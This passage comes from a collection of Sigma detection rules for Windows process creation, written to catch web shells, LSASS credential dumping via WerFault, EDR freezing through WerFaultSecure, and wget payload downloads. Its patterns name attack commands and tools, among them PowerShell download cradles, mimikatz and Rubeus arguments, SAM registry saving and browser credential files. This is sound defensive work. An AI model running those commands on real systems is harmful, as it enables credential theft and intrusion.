CommandLine|contains|all:\n            - 'net'\n            - ' user '\n            - ' /add'\n    selection_child_4:\n        CommandLine|contains|all:\n            - 'net'\n            - ' localgroup '\n            - ' administrators '\n            - 
'/add'\n    selection_child_5:\n        Image|endswith:\n            # Credential stealing\n            - '\\ntdsutil.exe'\n            # AD recon\n            - '\\ldifde.exe'\n            - '\\adfind.exe'\n            # Process dumping\n            - '\\procdump.exe'\n            - '\\Nanodump.exe'\n            # Destruction / ransom groups\n            - '\\vssadmin.exe'\n            - '\\fsutil.exe'\n    selection_child_6:\n        # SUspicious patterns\n        CommandLine|contains:\n            - ' -decode '  # Used with certutil\n            - ' -NoP '  # Often used in malicious PowerShell commands\n            - ' -W Hidden '  # Often used in malicious PowerShell commands\n            - ' /decode '  # Used with certutil\n            - ' /ticket:'  # Rubeus\n            - ' sekurlsa'  # Mimikatz\n            - '.dmp full'  # Process dumping method apart from procdump\n            - '.downloadfile('  # PowerShell download command\n            - '.downloadstring('  # PowerShell download command\n            - 'FromBase64String' # PowerShell encoded payload\n            - 'process call create' # WMIC process creation\n            - 'reg save '  # save registry SAM - syskey extraction\n            - 'whoami /priv'\n    condition: 1 of selection_webserver_* and 1 of selection_child_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml",
    "content": "title: Webshell Detection With Command Line Keywords\nid: bed2a484-9348-4143-8a8a-b801c979301c\nstatus: test\ndescription: Detects certain command line parameters often used during reconnaissance activity via web shells\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html\n    - https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\n    - https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson\ndate: 2017-01-01\nmodified: 2024-12-14\ntags:\n    - attack.persistence\n    - attack.discovery\n    - attack.t1505.003\n    - attack.t1018\n    - attack.t1033\n    - attack.t1087\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_webserver_image:\n        ParentImage|endswith:\n            - '\\w3wp.exe'\n            - '\\php-cgi.exe'\n            - '\\nginx.exe'\n            - '\\httpd.exe'\n            - '\\caddy.exe'\n            - '\\ws_tomcatservice.exe'\n    selection_webserver_characteristics_tomcat1:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentImage|contains:\n            - '-tomcat-'\n            - '\\tomcat'\n    selection_webserver_characteristics_tomcat2:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        CommandLine|contains:\n            - 'catalina.jar'\n            - 'CATALINA_HOME'\n    selection_susp_net_utility:\n        OriginalFileName:\n            - 'net.exe'\n            - 'net1.exe'\n        CommandLine|contains:\n            - ' user '\n            - ' use '\n            - ' group '\n    selection_susp_ping_utility:\n        OriginalFileName: 'ping.exe'\n        CommandLine|contains: ' -n '\n    selection_susp_change_dir:\n        
CommandLine|contains:\n            - '&cd&echo'  # china chopper web shell\n            - 'cd /d '  # https://www.computerhope.com/cdhlp.htm\n    selection_susp_wmic_utility:\n        OriginalFileName: 'wmic.exe'\n        CommandLine|contains: ' /node:'\n    selection_susp_powershell_cli:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - ' -enc '\n            - ' -EncodedCommand '\n            - ' -w hidden '\n            - ' -windowstyle hidden'\n            - '.WebClient).Download'\n    selection_susp_misc_discovery_binaries:\n        - Image|endswith:\n              - '\\dsquery.exe'\n              - '\\find.exe'\n              - '\\findstr.exe'\n              - '\\ipconfig.exe'\n              - '\\netstat.exe'\n              - '\\nslookup.exe'\n              - '\\pathping.exe'\n              - '\\quser.exe'\n              - '\\schtasks.exe'\n              - '\\systeminfo.exe'\n              - '\\tasklist.exe'\n              - '\\tracert.exe'\n              - '\\ver.exe'\n              - '\\wevtutil.exe'\n              - '\\whoami.exe'\n        - OriginalFileName:\n              - 'dsquery.exe'\n              - 'find.exe'\n              - 'findstr.exe'\n              - 'ipconfig.exe'\n              - 'netstat.exe'\n              - 'nslookup.exe'\n              - 'pathping.exe'\n              - 'quser.exe'\n              - 'schtasks.exe'\n              - 'sysinfo.exe'\n              - 'tasklist.exe'\n              - 'tracert.exe'\n              - 'ver.exe'\n              - 'VSSADMIN.EXE'\n              - 'wevtutil.exe'\n              - 'whoami.exe'\n    selection_susp_misc_discovery_commands:\n        CommandLine|contains:\n            - ' Test-NetConnection '\n            - 'dir \\'  # remote dir: dir \\<redacted IP #3>\\C$:\\windows\\temp\\*.exe\n    condition: 1 of selection_webserver_* and 1 of selection_susp_*\nfalsepositives:\n    - Unknown\nlevel: 
high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml",
    "content": "title: Suspicious Process By Web Server Process\nid: 8202070f-edeb-4d31-a010-a26c72ac5600\nstatus: test\ndescription: |\n    Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation\nreferences:\n    - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF\nauthor: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2024-11-26\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1505.003\n    - attack.t1190\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_webserver_image:\n        ParentImage|endswith:\n            - '\\caddy.exe'\n            - '\\httpd.exe'\n            - '\\nginx.exe'\n            - '\\php-cgi.exe'\n            - '\\php.exe'\n            - '\\tomcat.exe'\n            - '\\UMWorkerProcess.exe'  # https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html\n            - '\\w3wp.exe'\n            - '\\ws_TomcatService.exe'\n    selection_webserver_characteristics_tomcat1:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentImage|contains:\n            - '-tomcat-'\n            - '\\tomcat'\n    selection_webserver_characteristics_tomcat2:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentCommandLine|contains:\n            - 'CATALINA_HOME'\n            - 'catalina.home'\n            - 'catalina.jar'\n    selection_anomaly_children:\n        Image|endswith:\n            - '\\arp.exe'\n            - '\\at.exe'\n            - '\\bash.exe'\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\cmd.exe'\n     
       - '\\cscript.exe'\n            - '\\dsget.exe'\n            - '\\hostname.exe'\n            - '\\nbtstat.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netdom.exe'\n            - '\\netsh.exe'\n            - '\\nltest.exe'\n            - '\\ntdsutil.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\qprocess.exe'\n            - '\\query.exe'\n            - '\\qwinsta.exe'\n            - '\\reg.exe'\n            - '\\rundll32.exe'\n            - '\\sc.exe'\n            - '\\sh.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            - '\\wusa.exe'\n    filter_main_fp_1:\n        ParentImage|endswith: '\\java.exe'\n        CommandLine|endswith: 'Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt'\n    filter_main_fp_2:\n        ParentImage|endswith: '\\java.exe'\n        CommandLine|contains|all:\n            - 'sc query'\n            - 'ADManager Plus'\n    condition: 1 of selection_webserver_* and selection_anomaly_children and not 1 of filter_main_*\nfalsepositives:\n    - Particular web applications may spawn a shell process legitimately\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_tool_recon.yml",
    "content": "title: Webshell Tool Reconnaissance Activity\nid: f64e5c19-879c-4bae-b471-6d84c8339677\nstatus: test\ndescription: |\n    Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands\nreferences:\n    - https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html\nauthor: Cian Heasley, Florian Roth (Nextron Systems)\ndate: 2020-07-22\nmodified: 2023-11-09\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_webserver_image:\n        ParentImage|endswith:\n            - '\\caddy.exe'\n            - '\\httpd.exe'\n            - '\\nginx.exe'\n            - '\\php-cgi.exe'\n            - '\\w3wp.exe'\n            - '\\ws_tomcatservice.exe'\n    selection_webserver_characteristics_tomcat1:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentImage|contains:\n            - '-tomcat-'\n            - '\\tomcat'\n    selection_webserver_characteristics_tomcat2:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        CommandLine|contains:\n            - 'CATALINA_HOME'\n            - 'catalina.jar'\n    selection_recon:\n        CommandLine|contains:\n            - 'perl --help'\n            - 'perl -h'\n            - 'python --help'\n            - 'python -h'\n            - 'python3 --help'\n            - 'python3 -h'\n            - 'wget --help'\n    condition: 1 of selection_webserver_* and selection_recon\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml",
    "content": "title: Potential Credential Dumping Via WER\nid: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3\nstatus: test\ndescription: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass\nreferences:\n    - https://github.com/deepinstinct/Lsass-Shtinkering\n    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\nauthor: '@pbssubhash , Nasreddine Bencherchali'\ndate: 2022-12-08\nmodified: 2022-12-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\Werfault.exe'\n        - OriginalFileName: 'WerFault.exe'\n    selection_cli:\n        ParentUser|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        User|contains:\n            - 'AUTHORI'\n            - 'AUTORI'\n        CommandLine|contains|all:\n            # Doc: WerFault.exe -u -p <target process> -ip <source process> -s <file mapping handle>\n            # Example: C:\\Windows\\system32\\Werfault.exe -u -p 744 -ip 1112 -s 244\n            # If the source process is not equal to the target process and the target process is LSASS then this is an indication of this technique\n            # Example: If the \"-p\" points the PID of \"lsass.exe\" and \"-ip\" points to a different process than \"lsass.exe\" then this is a sign of malicious activity\n            - ' -u -p '\n            - ' -ip '\n            - ' -s '\n    filter_lsass:\n        ParentImage: 'C:\\Windows\\System32\\lsass.exe'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine.\nlevel: high\n"
  },
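The LSASS Shtinkering rule above matches only on the shape of the WerFault.exe command line, and its falsepositives note tells the analyst to check which process the `-p` PID belongs to. The following is an added example, not project code: a triage helper that parses the `-u -p <target> -ip <source> -s <handle>` syntax quoted in the rule's comment and resolves both PIDs against a process table, returning the verdict the comment describes (target is lsass.exe and the reporting process is something else). The process table, PIDs and the attacker path are constructed; in practice the table comes from the same host's process_creation telemetry, and PID reuse means the lookup must be time-bounded to the alert.

```python
"""Triage helper for alerts from the WER LSASS Shtinkering rule above.

Constructed example, not SigmaHQ code. Parses the WerFault.exe flags the rule
keys on and classifies the launch following the rule's own comment.
"""


def parse_werfault_args(command_line: str) -> dict:
    """Return the integer values of -p, -ip and -s from a WerFault command line.

    Absent flags are simply missing from the result; a non-numeric value raises
    ValueError so a malformed line is not silently triaged as benign.
    """
    tokens = command_line.split()
    out = {}
    for i, tok in enumerate(tokens):
        flag = tok.lower()
        if flag in ("-p", "-ip", "-s") and i + 1 < len(tokens):
            out[flag.lstrip("-")] = int(tokens[i + 1])
    return out


def triage_werfault(command_line: str, process_table: dict) -> str:
    """Classify one WerFault.exe launch.

    process_table maps PID -> image path as seen in process_creation telemetry
    around the time of the alert. Verdicts follow the rule comment: -p pointing
    at lsass.exe while -ip points at a different process is the technique.
    """
    args = parse_werfault_args(command_line)
    if "p" not in args:
        return "no-target-pid"
    if "ip" not in args:
        return "no-source-pid"  # the rule itself requires ' -ip ', so this never alerts
    target = process_table.get(args["p"])
    source = process_table.get(args["ip"])
    if target is None or source is None:
        return "unknown-pid"  # missing telemetry or PID reuse: pull more data before closing
    if not target.lower().endswith("\\lsass.exe"):
        return "non-lsass-target"
    if args["p"] == args["ip"] or source.lower().endswith("\\lsass.exe"):
        return "lsass-self-report"  # lsass reporting its own fault, the filter_lsass case
    return "lsass-shtinkering-suspect"


# Constructed process table for the example; PIDs and the attacker path are made up.
PROCESS_TABLE = {
    744: "C:\\Windows\\System32\\lsass.exe",
    1112: "C:\\Users\\Public\\werdump.exe",
    5208: "C:\\Windows\\System32\\notepad.exe",
}

# Constructed WerFault command lines; the first reuses the PIDs from the rule's comment.
SAMPLE_COMMAND_LINES = [
    "C:\\Windows\\system32\\Werfault.exe -u -p 744 -ip 1112 -s 244",
    "C:\\Windows\\system32\\Werfault.exe -u -p 744 -ip 744 -s 244",
    "C:\\Windows\\system32\\Werfault.exe -u -p 5208 -ip 5208 -s 300",
    "C:\\Windows\\system32\\Werfault.exe -u -p 744 -ip 9999 -s 244",
    "C:\\Windows\\system32\\Werfault.exe -u -p 5208 -s 300",
]


def triage_all(command_lines, process_table) -> list:
    return [triage_werfault(c, process_table) for c in command_lines]


if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_COMMAND_LINES, triage_all(SAMPLE_COMMAND_LINES, PROCESS_TABLE)):
        print(verdict.ljust(28), line)
```

Only the first sample, lsass as `-p` with an unrelated `-ip` process, comes back as a suspect; the self-report and notepad cases are the ordinary WER behaviour the rule's falsepositives entry warns about, and an unresolvable PID is reported as such rather than guessed.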
  {
    "path": "rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml",
    "content": "title: Potential ReflectDebugger Content Execution Via WerFault.EXE\nid: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd\nrelated:\n    - id: 0cf2e1c6-8d10-4273-8059-738778f981ad\n      type: derived\nstatus: test\ndescription: Detects execution of \"WerFault.exe\" with the \"-pr\" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow\nreferences:\n    - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html\n    - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-30\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\WerFault.exe'\n        - OriginalFileName: 'WerFault.exe'\n    selection_cli:\n        CommandLine|contains: ' -pr '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse.yml",
    "content": "title: PPL Tampering Via WerFaultSecure\nid: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2\nrelated:\n    - id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c\n      type: similar\n    - id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential abuse of WerFaultSecure.exe to dump Protected Process Light (PPL) processes like LSASS or to freeze security solutions (EDR/antivirus).\n    This technique is used by tools such as EDR-Freeze and WSASS to bypass PPL protections and access sensitive information or disable security software.\n    Distinct command line patterns help identify the specific tool:\n    - WSASS usage typically shows: \"WSASS.exe WerFaultSecure.exe [PID]\" in ParentCommandLine\n    - EDR-Freeze usage typically shows: \"EDR-Freeze_[version].exe [PID] [timeout]\" in ParentCommandLine\n    Legitimate debugging operations using WerFaultSecure are rare in production environments and should be investigated.\nreferences:\n    - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n    - https://github.com/TwoSevenOneT/EDR-Freeze/blob/a7f61030b36fbde89871f393488f7075d2aa89f6/EDR-Freeze.cpp#L53\n    - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n    - https://github.com/TwoSevenOneT/WSASS/blob/2c8fd9fa32143e7bc9f066e9511c6f8a57bc64b5/WSASS.cpp#L251\nauthor: Jason (https://github.com/0xbcf)\ndate: 2025-09-23\nmodified: 2025-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|endswith: '\\WerFaultSecure.exe'\n        - OriginalFileName: 'WerFaultSecure.exe'\n    selection_args:\n        CommandLine|contains|all:\n            - ' /h '\n            - ' /pid ' # Antimalware or EDR process pid will be after this flag\n            - ' /tid '\n            - ' /encfile '\n            - ' /cancel '\n            - ' /type '\n            - ' 268310'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of WerFaultSecure for debugging purposes\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml",
    "content": "title: Suspicious Child Process Of Wermgr.EXE\nid: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e\nrelated:\n    - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5\n      type: similar\nstatus: test\ndescription: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\n    - https://www.echotrail.io/insights/search/wermgr.exe\n    - https://github.com/binderlabs/DirCreate2System\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-14\nmodified: 2024-08-29\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\wermgr.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\ipconfig.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netstat.exe'\n            - '\\nslookup.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\systeminfo.exe'\n            - '\\whoami.exe'\n            - '\\wscript.exe'\n    filter_main_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains|all:\n            - 'C:\\Windows\\system32\\WerConCpl.dll'\n            - 'LaunchErcApp '\n        CommandLine|contains:\n            - '-queuereporting'\n            - '-responsepester'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml",
    "content": "title: Suspicious Execution Location Of Wermgr.EXE\nid: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5\nrelated:\n    - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e\n      type: similar\nstatus: test\ndescription: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\n    - https://www.echotrail.io/insights/search/wermgr.exe\n    - https://github.com/binderlabs/DirCreate2System\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-14\nmodified: 2023-08-23\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wermgr.exe'\n    filter_main_legit_location:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wget_download_direct_ip.yml",
    "content": "title: Suspicious File Download From IP Via Wget.EXE\nid: 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35\nstatus: test\ndescription: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe\nreferences:\n    - https://www.gnu.org/software/wget/manual/wget.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wget.exe'\n        - OriginalFileName: 'wget.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        - CommandLine|re: '\\s-O\\s'\n        - CommandLine|contains: '--output-document'\n    selection_ext:\n        CommandLine|endswith:\n            # Note you can transform this into a \"contains\" to increase coverage but you would need to take care of some FP.\n            - '.ps1'\n            - \".ps1'\"\n            - '.ps1\"'\n            - '.dat'\n            - \".dat'\"\n            - '.dat\"'\n            - '.msi'\n            - \".msi'\"\n            - '.msi\"'\n            - '.bat'\n            - \".bat'\"\n            - '.bat\"'\n            - '.exe'\n            - \".exe'\"\n            - '.exe\"'\n            - '.vbs'\n            - \".vbs'\"\n            - '.vbs\"'\n            - '.vbe'\n            - \".vbe'\"\n            - '.vbe\"'\n            - '.hta'\n            - \".hta'\"\n            - '.hta\"'\n            - '.dll'\n            - \".dll'\"\n            - '.dll\"'\n            - '.psm1'\n            - \".psm1'\"\n            - '.psm1\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml",
    "content": "title: Suspicious File Download From File Sharing Domain Via Wget.EXE\nid: a0d7e4d2-bede-4141-8896-bc6e237e977c\nstatus: test\ndescription: Detects potentially suspicious file downloads from file sharing domains using wget.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\nmodified: 2025-12-10\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wget.exe'\n        - OriginalFileName: 'wget.exe'\n    selection_websites:\n        CommandLine|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        - CommandLine|re: '\\s-O\\s'\n        - CommandLine|contains: '--output-document'\n    selection_ext:\n        CommandLine|endswith:\n            - '.ps1'\n            - \".ps1'\"\n            - '.ps1\"'\n            - '.dat'\n            - \".dat'\"\n            - '.dat\"'\n            - '.msi'\n            - \".msi'\"\n            - '.msi\"'\n            - '.bat'\n            - \".bat'\"\n            - '.bat\"'\n            - '.exe'\n            - \".exe'\"\n            - '.exe\"'\n            - '.vbs'\n            - \".vbs'\"\n            - '.vbs\"'\n            - '.vbe'\n            - \".vbe'\"\n            - '.vbe\"'\n            - '.hta'\n            - \".hta'\"\n            - '.hta\"'\n            - '.dll'\n            - \".dll'\"\n            - '.dll\"'\n            - '.psm1'\n            - \".psm1'\"\n            - '.psm1\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml",
    "content": "title: Suspicious File Download From IP Via Wget.EXE - Paths\nid: 40aa399c-7b02-4715-8e5f-73572b493f33\nstatus: test\ndescription: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe\nreferences:\n    - https://www.gnu.org/software/wget/manual/wget.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wget.exe'\n        - OriginalFileName: 'wget.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        - CommandLine|re: '\\s-O\\s'\n        - CommandLine|contains: '--output-document'\n    selection_paths:\n        - CommandLine|contains:\n              - ':\\PerfLogs\\'\n              - ':\\Temp\\'\n              - ':\\Users\\Public\\'\n              - ':\\Windows\\Help\\'\n              - ':\\Windows\\Temp\\'\n              - '\\Temporary Internet'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_where_browser_data_recon.yml",
    "content": "title: Suspicious Where Execution\nid: 725a9768-0f5e-4cb3-aec2-bc5719c6831a\nstatus: test\ndescription: |\n    Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\n    Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\n    internal network resources such as servers, tools/dashboards, or other related infrastructure.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-13\nmodified: 2022-06-29\ntags:\n    - attack.discovery\n    - attack.t1217\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    where_exe:\n        - Image|endswith: '\\where.exe'\n        - OriginalFileName: 'where.exe'\n    where_opt:\n        CommandLine|contains:\n            # Firefox Data\n            - 'places.sqlite'\n            - 'cookies.sqlite'\n            - 'formhistory.sqlite'\n            - 'logins.json'\n            - 'key4.db'\n            - 'key3.db'\n            - 'sessionstore.jsonlz4'\n            # Chrome Data\n            - 'History'\n            - 'Bookmarks'\n            - 'Cookies'\n            - 'Login Data'\n    condition: all of where_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml",
    "content": "title: Enumerate All Information With Whoami.EXE\nid: c248c896-e412-4279-8c15-1c558067b6fa\nstatus: test\ndescription: Detects the execution of \"whoami.exe\" with the \"/all\" flag\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\n    - https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-04\nmodified: 2024-03-05\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main_img:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    selection_main_cli:\n        CommandLine|contains|windash: ' -all'\n    condition: all of selection_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml",
